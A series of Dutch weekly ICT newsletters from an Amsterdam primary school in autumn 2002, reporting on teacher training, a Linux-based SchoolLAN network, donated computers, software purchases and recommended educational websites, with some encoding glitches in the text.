Dinsdag vond de start van onze ICT scholing van het komende schooljaar plaats. Waar gaan we aan werken? Aan het uitwerken van onze visie op ICT gebied. Aan het organiseren van ICT toepassingen. Aan gericht werken met een ICT onderdeel per bouw.
Onderbouw: omgaan met de registratie en organisatie van de programma?s
Middenbouw: tekstverwerken en taalonderwijs. + een email project.
Bovenbouw: werkstukken maken met behulp van informatie van internet

OVERLEG DIRECTIES EN AFD. ONDERWIJS

Afgelopen Dinsdag overlegden de directies met de Afd. Onderwijs van 'De Baarsjes', over het te volgen ICT Beleid.
Kort samengevat worden de scholen nagenoeg vrij gelaten in de aanpak, ontwikkeling en uitvoering van hun ICT beleid.
De Afd. ICT van de Rosa Boedrukker (i.c. Karin en Dirk) is aan de ene kant verheugd over deze beleidsuitspraak. Het biedt de gelegenheid op voortvarende manier het ingeslagen ICT pad verder te bewandelen.
Aan de andere kant echter zijn we teleurgesteld over deze 'beleidsuitspraak' van het bevoegd gezag. Wij ervaren dit als een 'laissez-faire'-beleid dat meningsvorming, discussie en besluiten over wenselijkheden, haalbaarheden en targets uit de weg gaat. Wij zien liever een Bestuur dat bijvoorbeeld zou stellen: "We laten jullie vrij, maar willen dat school A binnen tijd-X Y bereikt heeft". Dat ervaren wij als een bestuur dat zich mede compromitteert aan doelstellingen en ons, uitvoerders van vastgesteld beleid, 'scherp' houdt. Zo'n uitspraak nodigt uit tot besluiten die uitgevoerd worden (of niet), tezamen met de daaraan verbonden consequenties.
Het gevolg van het 'kader' dat nu voor ICT ontwikkeling is geschetst kan zijn: ad-hoc beleid, versnipperde inzet van mensen en middelen, gebrek aan co?natie en frustraties bij betrokkenen.
Wij hopen dat directies en bestuur gaan voor een proces dat leidt tot 'kwaliteit' in plaats van 'vrijblijvendheid'. Wij gaan er in ieder geval wel voor en willen via deze weg onze bijdrage daaraan leveren.

SCHOOLLAN

We zijn druk doende andere scholen te vinden die met ons mee willen doen met schoolLan. Wat we er tot nu toe van hebben gezien en gehoord lijkt een prachtige oplossing voor onderhoud, beheer en samenwerking.

SITES:

http://www.schoollan.nl en klik dan op 'kookboek')rosaboekdrukker.net
Onze eigen website. We hebben geprobeerd hem zo zakelijk, helder en efficiënt mogelijk te maken. Als je de ctrl toets ingedrukt houdt en aan je scroll wieltje draait, kun je de grootte van je lettertype beïnvloeden. Dat kan ten koste gaan van de layout. Maar probeer het eens.
En schrijf iets in het gastenboek!

http://www.steffie.nl/
Op deze site is een cursusje internetten voor kinderen. Graag bekijken en beoordelen. Is het wat? Dit is waarschijnlijk een voorbeeld van hoe de computer de rol van de leraar overneemt om iets te leren. (kwam ter sprake op de studiemiddag)

groeten en een goed weekend,
Karin
Dirk

2002-09-06 w36

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker
Jaargang 2 - week 36
++++++++++++++++++++++++++++++++++++++++++++++++++++++

CONTENT MANAGEMENT SYSTEEM

Maandag hebben Ronald en Karin les gehad in het omgaan met de website. Hoe wordt hij gevuld? Want zoals hij nu is, is het natuurlijk nog erg saai. En lang niet volledig. Er moeten illustraties van kinderen bijkomen, foto?s, informatie en noem maar op. Het is nu gelukt om de nieuwsbrieven netjes erin te "linken" Graag verdere suggesties.

SOFTWARE

Deze week vooral bezig geweest met het uitzoeken welke software op de server kan. Ik-reken staat erop, maar nu moeten de leerlinggegevens er nog in. En we moesten uitvinden hoe je extra groepen kunt aanmaken. De Bosatlas Nederland en Europa doen het. Die van de Wereld is besteld. Ik-tover en ik-speel draaien ook prima.
Dirk vindt het nu ingewikkeld worden. Als software en gegevens centraal op de server staan moet

NASCHOOLSE TYPECURSUS

We gaan van ons eigen budget een naschoolse typecursus organiseren. Deze week met Wouter Meijer afgesproken, dat het voor 8 kinderen zal zijn. Die krijgen tien lessen op dinsdag van 15.30 uur tot 16.30 uur. We bekijken, of we de kinderen "leencomputers" mee kunnen geven om thuis te oefenen. De 8 kinderen zullen worden geloot in de groepen 7 en 8. Nu nog het juiste typeprogramma vinden. TypingMaster lijkt het beste, maar de licentievoorwaarden zijn even lastig.
Zodra het programma er is, kan gestart worden.

SCHOLING

Er zijn data afgesproken waarop de groepen, 6, 6/7, 7 en 8 voor een les naar het computerlokaal op het ABC gaan. Elke groep krijgt weer een les waarmee in de klas verder gewerkt zal worden.

AANBOD TWEEDEHANDS COMPUTERS

Van ons bevriende gemeentelijke bedrijf ontvingen we deze week bericht, dat er weer oude computers weggedaan worden. Omdat we zoveel plezier hebben van de vorige twee zendingen, hebben we het aanbod gretig aanvaard. Dit zouden de 'thuiscomputers' van de typecursisten kunnen worden.

SCHOOLLAN

We hebben niets meer gehoord. Maar, we hebben contact met de ICT Academie en hopen op korte termijn een afspraak met ze te hebben.

LINKS/SITES

e.e.a wel veilig en volgens 'normen en specificaties' gaan. Daarom hebben we voor volgende week een afspraak gemaakt met Valentijn Sessink ( www.openoffice.nl )om te bespreken wat hij voor ons kan betekenen. rosaboekdrukker.net
Graag opbouwende kritiek/commentaar/suggesties. Meld het ons alsjeblieft als je de webste niet kan ontvangen. Bij Ronald lukt dat maar niet en we vragen ons af of het aan de site of aan Ronald's computer, aansluiting of wat dan ook ligt.

http://jopsoft.free.fr/
Allemaal gratis Nederlandse programma?s die er op het eerste gezicht prima en inspirerend uitzien. Wie heeft zin om uit te zoeken of er iets voor ons bij zit?

http://www.typingmaster.nl/
Wordt dit ons type programma? Demoversie gratis te downloaden.
Ik heb één licentie besteld van het typeprogramma.

Tot zover, goed weekend,
Karin
Dirk

2002-09-13 w37

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker
Jaargang 2 - week 37
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Leeswijzer:

Dit is een lange aflevering met uitgebreide info over gebruikerservaringen met SchoolLAN. Gewoon overslaan als je dat niet interesseert. Veel leesplezier.

WEBSITE

Er moet nog een hoop gedaan/geleerd worden voordat de site naar wens is. Er gaan nog wat dingen niet goed. Ook is nog niet alles gesnapt.

SOFTWARE

De afspraak met Valentijn Sessink is een week uitgesteld. Met hem gaan we bespreken wat zijn bedrijf kan doen om ons te helpen Windows software onder Linux op een verantwoorde manier aan de praat te krijgen (en te houden).

NASCHOOLSE TYPECURSUS

Programma is besteld en betaald. We gaan eerst kijken of één licentie het doet op de Linux-server voordat we meer licenties in huis halen.

SCHOLING

Een drukke week. De leerkrachten van de groepen 3 t/m 5 hebben besproken wat er de komende tijd gaat gebeuren en hoe. Tot de kerstvakantie wordt gewerkt aan het leren tekstverwerken in samenhang met de gebruikte taalmethodes. Voor groep 3 opdrachten met Paint in combinatie met Veilig Leren Lezen. Voor de groepen 4 en 5 tekstverwerkingsopdrachten met behulp van taallessen uit Taalleesland. Afgesproken is hoeveel weken elke groep nodig heeft om elk kind aan bod te laten komen.Elke klas zal bezocht worden door Bart om te kijken hoe het gaat. Ook hebben we benadrukt, dat meteen door de kinderen geleerd moet worden hoe met spaties en leestekens om te gaan. De scholing voor de leerkrachten van de groepen 6 t/m 8 is uitgesteld tot 1 oktober.

Klassenbezoek aan het ABC (groep 6 en 8) was vandaag. Groep 6 heeft materiaal gezocht over en geschreven over Orka's. Groep 8 is bezig geweest over Japan. Duidelijk is geworden waar de hiaten op computervaardigheden zitten bij de leerlingen.

STORINGEN

Een beeldscherm bleef zwart. Verholpen door de stekkers aan te drukken.

BESTELLINGEN

Er zijn 5 nieuwe computers besteld bij de PC dokter. Hij gaat op zoek naar 'geruisloze' desktops (geen towers vanwege ruimtegebrek) +-500Mhz, 128 Mb RAM, netwerkaart met PXE (voorbereiding op SchoolLLAN). Verder niks bijzonders en een beeldscherm van 17". Meer hebben we niet nodig. Onze heerlijke simpele opstelling (6 krijg-computers op een rijtje, die erg in trek zijn) is maar pentium 133. Je kan er op internetten en mee tekstverwerken en een paar programma's van de server op doen (topo, rekenweb) meer is daar niet nodig!!

ONDERZOEK SCHOOLLAN

Iedereen die in computers wat aan te bieden heeft, prijst zijn produkt de hemel in en zwijgt als het graf over de nadelen. Wij horen graag wat de eindgebruikers vinden en hebben wat scholen benaderd die met 'SchoolLAN' werken om hun ervaringen te horen.

Lees en HUIVER!

We spraken met René v.d. Sanden van "De Samensprong" in Grubbenvorst. Zeer enthousiast over SchoolLAN. Systeem draait al 5 jaar zonder uitvallen. Hij heeft minimale kennis over het systeem en kan alleen hele simpele zaken. Met 14 scholen hebben ze 1 systeembeheerder in de regio (zie verhaal van Prisma, hieronder) die ze bellen als er wat nodig is. Grote voordelen:

- financieel (gratis)

- stabiliteit (het valt nooit uit)

- onafhankelijkheid ( je hebt met niemand wat te maken)

- het systeem is helemaal ingericht voor basis(onderstreept!)scholen

- je kunt werken met goedkope computers.

- je merkt als gebruiker niets van het Linux systeem.

Nadeel: Maar, net als met WindowsNT moet je af en toe dingen uitbesteden. Daar heb je de systeembeheerder voor.

We spraken ook met Hans v. Wijk van de Arnhemse montessorischool. Zij zijn "uiteindelijk positief, best tevreden". Ze zijn nu twee jaar bezig en hadden in het begin aanloopproblemen, bijvoorbeeld 'vastlopende Linux'. Ook ervoeren ze dat het hebben van een mengelmoesje van computers veel tijd kost om af te stemmen. "Maar als het eenmaal draait, dan loopt 't ". Ze krijgen ondersteuning van studenten van het ROC Arnhem gedurende een halve dag per week en voelen soms wel het verschil in ervaring en kennisniveau van de studenten die stage lopen en onderhoud doen. Soms duren zaken lang, soms zijn ze zo enthousiast dat je ze moet afremmen, anders keren ze alle computers tegelijk ondersteboven. De studenten hebben geen enkel probleem om Windows software onder Linux draaiend te krijgen. Windows software loopt nu een jaar probleemloos onder Linux, behalve sommige OWG programma's. Wat ook heel makkelijk gaat is het herstellen van een Windows computer na een computercrash. Je leert 't in 10 minuten en in dezelfde tijd staat je computer na een crash weer klaar. Kortom, het is voordeling omdat het geheel niets kost, maar je levert wat in qua gemak.

We spraken ook met Thijs Rutten voorzitter van Prisma, een schoolbestuur dat 14 lagere scholen bestuurt en voor nog 3 lagere scholen ICT diensten verleent. In totaal zijn er 4000 leerlingen. Prisma beheert 700 computers en 16 servers. Ze hebben een systeembeheerder aangetrokken voor beheer op afstand en om storingen ter plekke te verhelpen. De scholen kunnen een servicecontract afsluiten (maximaal 1400 Euro per jaar) of éénmalige aanvragen voor service doen (14 euro per keer). De systeembeheerder is pas in dienst en het project in zijn startfase. Als alles draait gaat de systeembeheerder software ontwikkelen voor de scholen die ook weer via SchoolLAN beschikbaar komt.Voordeel van Linux volgens Thijs: Toen ze er aan begonnen: "Het kost niks en als 't niet bevalt gooien we 't er af en nemen Windows NT".

- Goedkope werkstations. Hij had net weer een partijtje gekocht. P II 400 voor 350 Euro p/s, compleet.

Nadeel: Mensen zijn moeilijk te overtuigen van het goeie van Linux voor 't onderwijs. Computerverkopers branden je af als ze horen dat je met Linux werkt. We hebben hier een uitgebreide voorlichting gegeven aan scholen in de regio, maar FUD overheerst, waardoor ze toch voor WinNT gaan.

Tot besluit. Wat is FUD??

"FUD stands for Fear, Uncertainty, Doubt.

It is a marketing technique used when a competitor launches a product that is both better than yours and costs less, i.e. your product is no longer competitive. Unable to respond with hard facts, scare-mongering is used via 'gossip channels' to cast a shadow of doubt over the competitors offerings and make people think twice before using it."

2002-09-20 w38

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosa Boekdrukker
Jaargang 2 - week 38
++++++++++++++++++++++++++++++++++++++++++++++++++++++

PRINTER

Wij hebben een kopieerapparaat op school, dat dubbelzijdig kan printen, nieten en automatisch op alle verdiepingen bezorgen :-). Dat apparaat hangt nu aan ons netwerk. Wie op de begane grond zwart wit wil printen, haalt het resultaat uit de Nashua copier. Ronald kan zelfs vanaf zijn computer het commando geven: printen aan twee kantjes met nietje. Het ding werkt ook onder Linux.

SOFTWARE

Onze zorg is niet meer zozeer het netwerk en de computers, maar hoe??? Hoe moet de educatieve software in de toekomst, morgen e.d. Vorig jaar hebben we bekeken welke software we in elk geval wel en in elk geval niet meer willen gebruiken. Stapels cd-roms zijn nu ongebruikt. Maar er is wel behoefte aan programma's. Programma's die uitdagen, die er de lol inhouden. In groep 2 is ik-reken niet meer erg in trek, omdat het te lang duurt, te lang in 1 niveau blijft hangen. Als je dan zegt: ga naar het rekenweb, dan lukt dat ook niet goed, want het gaat te traag. Daar wordt nu aan gewerkt.

Deze week is de Leesladder binnengekomen. Leesladder 1 was na een half uur installeren 10% van de hoeveelheid gevorderd. Hij bleef 's nachts door installeren en de volgende ochtend was ie klaar. Programma werkt traag, net als op het ABC.

COMPUTERS BESTELD

Bij de pc dokter weer 6 desktops besteld (desktops, geen torens, zodat het beeldscherm erop past) (ruimte besparing). 600 euro per stuk incl. monitor etc. en mijn computer thuis (Karin) verdrinkt er zo'n beetje in.

WERK VAN KINDEREN

Op de website staat werk van leerlingen. De tekening van de week is ook weer eens vernieuwd. Groep 8 is druk bezig om de tekstverwerkingsvaardigheden te verbeteren.

INLOGGEN

LEES DIT!!!! Je moet ALTIJD inloggen als je gaat computeren. Als je het fout doet, dan zijn de instellingen om automatisch in Word in de eigen mappen te komen ontregeld en kost het weer moeite om de instellingen goed te zetten. Dus NOOIT op 'Annuleren' of 'escape' klikken bij aanmelden. Altijd inloggen met eigen groepsnaam en wachtwoord. Voor leerkrachten geldt een eigen password te verkrijgen bij de afdeling ICT.
Waarom goed inloggen??? Dan kun je bij de file-server komen. Als je een tekst tikt, kun je je eigen map vinden en je tekst daar opslaan. Zie ook verderop bij 'OPENBAAR'.

Gesprek met Valentijn Sessink van Open Office

Afgelopen maandag hebben we met Valentijn Sessink (Linux) besproken wat hij voor ons kan betekenen m.b.t. software installeren. Weer een heel technisch verhaal. Uit dat gesprek is weer een fantastisch plan ontsproten: we gaan (met heel Nederland) een lijst aanleggen met educatieve software die onder Linux werkt. Maar daar worden dan ook de handleidingen bij meegeleverd. Bij SchoolLan hebben ze al zo'n lijst, maar zonder handleidingen. Jammer genoeg hebben we deze week nog niks van SchoolLan gehoord.

OPENBAAR

Wij zijn voor openheid, waar het schoolse zaken betreft. Daarom moeten alle leerkrachten met hetzelfde password inloggen op de fileserver. Daar zijn alle mappen van andere leerkrachten dan te zien en in te kijken. Respect voor elkaars stukken wordt dan verwacht, zoals we dat ook bij leerlingen doen. Leerkrachten die via school willen emailen, kunnen op hun eigen computer meedoen aan een gezamenlijk emailadres. De ontvanger ziet dan de naam van de betrokken leerkracht. De leerkracht die post terugkrijgt, ziet ook de post voor de ander collega's. We gaan even kijken of dit te doen is.

STORINGEN

Eén muis vervangen. Kennisnet soms niet vooruit te branden.

WEBSITE.

Er wordt steeds aan gewerkt. Er komt weinig commentaar. Jammer. Of juist goed? Verder willen we hier een hardnekkig gerucht ontkrachten: Ronald en Agnes hebben helemaal geen ruzie! Ze gaan heel goed met elkaar! Willen de verspreiders van dit gerucht nu ophouden!

EDUCATIEVE SITES

Leerlingen en leerkrachten opgelet! Greenpeace op school is weer begonnen. Leerlingen zoeken informatie voor werkstukken en spreekbeurten. Leerkrachten zoeken interessante lespakketten en geschikte excursies. Hieronder vind je een overzicht wat Greenpeace te bieden heeft voor leerlingen en leerkrachten: http://www.greenpeace.nl/features/details?features_id=25709

Er zitten hele goede en leerzame rekenspellen op de site van het Freudenthal Instituut. Groep 4 heeft zich deze week over de doolhoven gebogen. Maar kijk ook eens naar de tangram. De puzzelstukjes kun je draaien door op de gekleurde knoppen te drukken. http://www.fi.uu.nl/rekenweb/rekenmaar/leerlingen/welcome.xml?sort=title&groep=1

OVERIGE SITES

Goeie link over Linux in het Nederlandse Onderwijs die mangagers en ICT coördinatoren in staat stelt een weloverwogen keus voor of tegen Open Source Software te maken: http://www.ictopschool.net/files/Informatiewijzer-oss.pdf

Groet en goed weekend,
Karin, Dirk

-------------------------------------------------------
O.B.S. Rosa Boekdrukker
Vancouverstraat 3 - 5
1056 DT  Amsterdam
tel. & fax: 020-6128000
info@rosaboekdrukker.net
http://rosaboekdrukker.net

2002-09-27 w39

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosa Boekdrukker
Jaargang 2 - week 39
++++++++++++++++++++++++++++++++++++++++++++++++++++++

INLOGGEN

Nog steeds problemen met het inloggen. De leerkrachten van de RB krijgen daar een aparte nieuwsbrief over.

BEDRIJFSUITJE.NL

Dirk, Karin en Ellen (beleidsmedewerkster van Stadsdeel De Baarsjes) hebben deze week een kijkje mogen nemen in de serverruimte van de Open Scholengemeenschap Bijlmer. Peter Berkhout heeft ons een uitgebreide rondleiding gegeven langs de computersystemen en ons van alles uitgelegd over ?beheer op afstand?. Het was heel leerzaam en heel erg de moeite waard om te horen hoe op een andere school gewerkt wordt. Het is natuurlijk niet vergelijkbaar met een klein basisschooltje qua omvang, maar de problematiek blijft dezelfde: met welk systeem werk je?

KLEUTERSOFTWARE.

We hebben nog steeds geen nieuw taalprogramma bij de kleuters. Volgende week is er nascholing en dan komt dat aan de orde. Ook de klachten over Ik-reken worden dan meegenomen.

SCHOLING

Volgende week de eerste bijeenkomst om te oefenen voor de eigen ICT-vaardigheden van de leerkrachten. Dit is een facultatief traject. Gedurende 5 bijeenkomsten wordt gewerkt aan het opvijzelen van het gebruik van de computer. Er wordt gebruik gemaakt van de methode Instruct. Je gaat er thuis mee aan de gang en je kunt op die bijeenkomsten je vragen stellen. Elke bijeenkomst worden ook onderwerpen aan de orde gesteld die van te voren door de leerkrachten zijn aangegeven.

Groep 6/7 en 7 zijn deze week naar het OCA gegaan voor hun les over het maken van werkstukken. Binnenkort op onze website te bewonderen.

Volgende week ook ICT scholing voor de leerkrachten van groep 6 t/m 8 en de groepen 1 en 2.

SITE VAN DE WEEK: rosaboekdrukker.net

SOFTWARE

Niet alles krijgt Dirk aan de praat in het Netwerk. Maar mò¨´ alles op het netwerk? Onze ?informanten? raden ons dat af. Zet alleen de software op de computer die vanaf elk werkstation bereikbaar moet zijn vanwege de registratie. Wat op een losse computer kan zonder cd-rom: doe dat. Je krijgt anders verstopping in je netwerk. Dank, Peter Berkhout en Valentijn Sessink voor jullie adviezen tot dusver.

De Leesladder doet het. Het duurde wel één nacht om 1 cd-rom te installeren. De andere drie moeten nog ge﮳talleerd worden.

COMPUTERS VAN EEN BEVRIENDE GEMEENTELIJKE INSTELLING.

Er komt weer wat overtollig materiaal aan. We willen dit materiaal inzetten als 'uitleencomputers' voor leerlingen die de typecursus gaan volgen.

SQUID

Voor de technici. We hebben de proxy server draaien. Nu kunnen we beter sites tegenhouden als http://www.datwiljenietwetenwatwijindebrowservondenzovies.nl

Bedankt Peter Berkhout!!

Groeten,
Karin
Dirk

2002-10-04 w40

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker
Jaargang 2 - week 40
++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOERA !!

De nieuwsbrief bestaat één jaar! Tijd voor een korte terugblik.
We hebben de nb opgezet om onze ICT activiteiten te administreren en om anderen op de hoogte te houden van onze activiteiten. Als je in de nb's bladert, dan is er in het afgelopen jaar heel veel gedaan. Reden tot een klein feestje.
VRIJDAG 25 OKTOBER 2002 op de OBSRB:
We nodigen de lezers van de nb uit op een drankje om het éénjarig bestaan van de Baarsjes Informatie en Communicatie nieuwsbrief te vieren.
Wil je ons VAN TE VOREN mailen (kies één optie): = NEE, ik kom niet op de borrel en NEE, ik wil de BIC niet meer.
= NEE, ik kom niet op de borrel en JA ik wil de BIC blijven ontvangen.
= JA, ik wil die borrel en NEE, ik wil de BIC niet blijven ontvangen.
= JA, ik wil die borrel en JA ik wil de BIC blijven ontvangen.
= Ik abonneer me voor EUR 25,-- per nummer. Stort het geld in het ICT fonds. Stuur me ook de oude nummers voor 40 x E 25 = E 600,-- :-)

NASCHOLINGEN

Deze week was het erg druk met scholingen. Maandag zijn we begonnen met het op vrijwillige basis werken aan onderdelen van het DRO. We zaten zo gezellig in de bovenhal met zijn allen. Iedereen die meedoet kreeg een cursusboek van Instruct, diskettes met oefenbestanden en huiswerkopdrachten.
Dinsdag was er nascholing op het ABC met de leerkrachten van de groepen 6 t/m 8 over internet en email in de klas. We hebben bekeken wat geschikte sites zijn om kinderen op te laten zoeken.
Donderdag hebben we met de kleutergroepen een besluit genomen. De kogel is door de kerk! Er is besloten om het programma Letterpret aan te schaffen (en niet Schatkist met de muis). Nu wordt het afwachten hoe snel de firma Malmberg is met de levering.

HARDWARE

We ontvingen van een zeer bevriende Gemeentelijke Instelling 25 computers en monitoren. Dirk is ze nu aan het samenstellen. Hij denkt dat er zo'n 15 computers uit zijn samen te stellen.
Dank Peter en Paul voor jullie inspanningen in deze!

PLANNEN

Volgende week vergaderen we met de ICT academie in de Baarsjes over samenwerking.

SITES

Het maki-ezine is opgeheven en overgenomen door een e-zine van Kennisnet.
Deze week kreeg ik de eerste binnen en wat vond ik daar?
http://www.taalsite.nl/
Ga eens kijken!!! Klik op lessen.

http://www.kennisnet.nl/po/leerkracht/index.html
De site Leerkracht PO.
Deze site richt zich op alle leerkrachten in het primair onderwijs die ICT in hun dagelijkse lessituatie willen inpassen. De acht hoofdrubrieken geven u een overzicht van actuele ontwikkelingen op het gebied van onderwijs en ICT.

www.voelspriet.nl
Alles over zoeken op het internet.

http://www.thiememeulenhoff.nl/dewerelddichtbij/pagina.asp?pagkey=4185114 Leuke links die passen bij onze nieuwe aardrijkskunde methode

prettig weekend,
Karin
Dirk

2002-10-11 w41

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosa Boekdrukker Jaargang 2 - week 41 ++++++++++++++++++++++++++++++++++++++++++++++++++++++

Hier de wat verlate BIC-nieuwsbrief.

BEZOEK ICT ACADEMIE

Karin, Ellen Warmer (beleidsmedewerker onderwijs Stadsdeel de Baarsjes) en Dirk brachten een kennismakingsbezoek aan de ICT Academie aan de Jan van Bremenstraat  in ons stadsdeel. Als we met SchoolLAN ( http://www.schoollan.nl ) verder gaan, zal veel werk op scholen verricht gaan worden door stagiaires van de ICT Academie.  Denk daarbij aan 'beheer op afstand' en 'beheer op school'. De basisscholen zijn goede stageplekken en zouden op deze manier bijdragen aan de ontwikkeling van ICT'ers en ook nog goedkoop hun beheer voor elkaar kunnen hebben.
SchoolLAN heeft al veel ervaring met dit deze methode van werken, o.a. rond Arnhem, in Friesland, rond Hoorn en in Limburg (Venlo). Binnenkort zal een vervolggespreksronde plaats vinden.

BORREL 25 OKTOBER

We hebben nog maar drie aanmeldingen binnen voor de borrel op 25 oktober. Iedereen die deze nieuwsbrief ontvangt is welkom.

TOWN

Rond Tilburg is er een grootscheepse samenwerking tussen scholen, genaamd TOWN. In hun nieuwsbrief o.a. de volgende mededeling: Klussenwijzers Eé® van de drukst bezochte onderdelen van de website van Town is het onderdeel Klussenwijzers. Veel leerkrachten weten de weg naar deze gratis en copyrightvrije cursussen te vinden. Ze worden gebruikt in de bovenbouw PO, in VO, maar ook om de eigen vaardigheden van leerkrachten te verbeteren. Onlangs werd een complete cursus Internet toegevoegd, ontwikkeld op het Centrum voor Buitenlandse Vrouwen (CBV) in Tilburg. Zie http://www.town.nl/klussenwijzers

SITES

Speurtocht Netwijs
Netwijs, een zoekmachine voor basisschoolkinderen, organiseert elk jaar een aantal virtuele speurtochten. Leerlingen moeten daarbij in de sites van Netwijs antwoorden op een aantal vragen zoeken. Met de eerste letters van de antwoorden kan een nieuw woord gevormd worden. Bovenbouwgroepen van PO kunnen dit jaar ook weer meedoen aan het kampioenschap van dit jaar! Deze maand zal de eerste speurtocht starten. http://www.netwijs.nl/speurtocht.htm

Protocol Internet
Naarmate scholen steeds vaker gebruik gaan maken van Internet binnen het onderwijs rijst al snel de vraag naar een voorbeeld van afspraken met leerlingen. Daarnaast willen scholen toestemming vragen aan ouders om foto's van leerlingen op Internet te publiceren. Bij de Klussenwijzers van Town is een voorbeeld protocol opgenomen, ontwikkeld door basisschool De Wingerd in Oisterwijk. Zie http://www.town.nl/klussenwijzers, onderdeel Internet, diversen.

Praxis Bulletin
Een tijdschrift vol met handige lessuggesties. Maar ook via het Internet te benaderen. Als je in het papieren bulletin het wachtwoord hebt gelezen, dan kun je een schat aan informatie vinden in hun ?archief?. In het on-line magazine staan allerlei aanvullende tips op hun artikelen. Sla uw slag!!! Maak uw lessen superinteressant. Bloei weer op!! http://www.praxisbulletin.nl/

Nieuwsbrief Kennisnet
http://www.kennisnet.nl/po/leerkracht/index.html Hierin staan handige suggesties om het onderwijs te verlevendigen.

rosaboekdrukker.net
Kijk bij Leerkrachten en lessuggesties. Daarin staan enkele nieuwsbrieven opgenomen.

Prettige vakantie,
Karin
Dirk

2002-10-18 w42

 
Geen nieuwsbrief. Herfstvakantie!!!!!!

2002-10-25 w43

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 43
++++++++++++++++++++++++++++++++++++++++++++++++++++++

druk druk druk

NIEUWE COMPUTERS

De zes nieuwe computers kwamen deze week binnen. Ook twee collega?s hebben meegedaan met deze zending pentium4 computers, 1,2 Ghz, 256 Mb Ram, 20 GB HD, incl 17 inch monitor. Voor leerkrachten E560,-- voor de OBSRB . Betere netwerkkaart rond de ?600 per stuk. We moeten nu alleen de tijd vinden om de boel de substitueren. Het betekent: een afgeschreven computer weghalen en de software op de nieuwe zetten. Nog maar enkele programma?s gaan via de server, maar zelfs dan moet je nog op een computer de icoontjes aanmaken.

DRO

Weer een bijeenkomst om de eigen vaardigheden te oefenen. De methode Instruct is heel duidelijk. Op zo?n bijeenkomst kun je aan de slag met je opdrachten en vragen stellen als het niet lukt. Iedereen is heel enthousiast en vastberaden meer te gaan oefenen thuis!!

KOHNSTAMM INSTITUUT

Karin heeft een oriënterend gesprek gehad met een medewerker van het Kohnstamm instituut over samenwerkend leren (een europees project). Waarschijnlijk gaat ze met haar groep meedoen aan een experiment daarover.

OUDE NIEUWE COMPUTERS

Vlak voor de herfstvakantie kregen we van een bevriend gemeentelijk bedrijf heel veel afgeschreven computers. We wisten ons even geen raad met de beeldschermen. Die stonden her en der door de school verspreid. Ondertussen hebben ze andere beeldschermen vervangen. Het zijn namelijk heel scherpe beeldschermen. De computersystemen zijn tijdelijk in een werkplaats om ze te hergroeperen. We kijken hoe ze zo optimaal kunnen worden gemaakt. Sommige systemen zijn incompleet en worden gekannibaliseerd.

LETTERPRET

We hebben besloten dat we voor de kleuterbouw het programma Letterpret willen aanschaffen. Het moet kunnen werken op de Linux-server. Een school in Leeuwarden heeft dat voor elkaar gekregen. Dus nu gaat de bestelling de deur uit.

ICT CONSULT MIDDENBOUW.

We hebben ge붡lueerd hoe de lessen taal op de computer in de groepen 3, 4 en 5 zijn gelukt. We vonden dat er teveel tekst staat in de instructie. Dat het beter werkt als kinderen aan elkaar instructie geven. We gaan nu proberen om via woordvelden de ICT vaardigheden aan te leren. Er is een lijst gemaakt van vaardigheden die per groep beheerst/geleerd moeten worden. Aan de hand van die lijst zullen de woordvelden en overige oefeningen gemaakt moeten gaan worden.

ICT BORREL.

Deze week vieren we het 1 jaar uitbrengen van de BIC (Baarsjes Informatie en Communicatie nieuwsbrief). Die wordt altijd gedurende de week opgezet en op vrijdag na schooltijd uitgewerkt en afgemaakt. Het dient ook als naslagwerk voor onszelf. Zo kunnen we nalezen wat er wanneer aan de orde is geweest. De opgegeven ?links? zullen we gaan bijhouden op onze eigen site.

CURSUS TYPEN VOOR LEERLINGEN

Ligt even op zijn gat omdat we nog steeds het meest handige programma niet hebben weten te vinden. Wel leerlingen die het graag willen doen. De docent (Wouter) is nog steeds bereid en wil zelfs op andere onderdelen helpen na schooltijd. Het buurtcentrum zal binnenkort starten met computerlessen aan kinderen.

BELEIDSPLAN ICT.

Daar wordt hard aan gewerkt.

SITES

www.virusalert.nl
Dit is de laatste keer dat ik iets over virussen zeg. Neem een virusscanner en een abonnement op de site van virusalert. Ik heb zelf die Bugbear 10 keer binnen gehad, maar werd netjes gewaarschuwd door de virusscanner. rosaboekdrukker.net
Graag commentaar in ons gastenboek.

groeten,
Karin
Dirk

2002-11-01 w44

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 44
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT BORREL  (vorige week)

Was zeer gezellig. Er kwam een kennis van Dirk nog even een tipje van de sluier oplichten over Dirk zijn werkwijze!

ICT ACADEMIE

Gesprek met stagebegeleider ICT Academie leverde op: binnenkort een stagiaire van die Academie. Die gaat ons helpen met het beheer (op afstand en op school)  gedurende 3 dagen per week. We zijn zeer benieuwd en kijken uit naar haar/hem.

NASCHOLINGEN

Nadere afspraken gemaakt voor groepen 6 t/m 8. Niet gemakkelijk. Volgende week komt Monique kijken in de groepen 6 t/m 8. Onderwerp: hoe werken de kinderen op de computer aan een werkstuk.
Groep 3 werkt nog aan de opdrachten in Paint.
Groep 4 begint aan de woordvelden in Paint. De producten van groep 3 werken zeer inspirerend!!

NIEUWE COMPUTERS IN ORDE MAKEN (een lijstje)

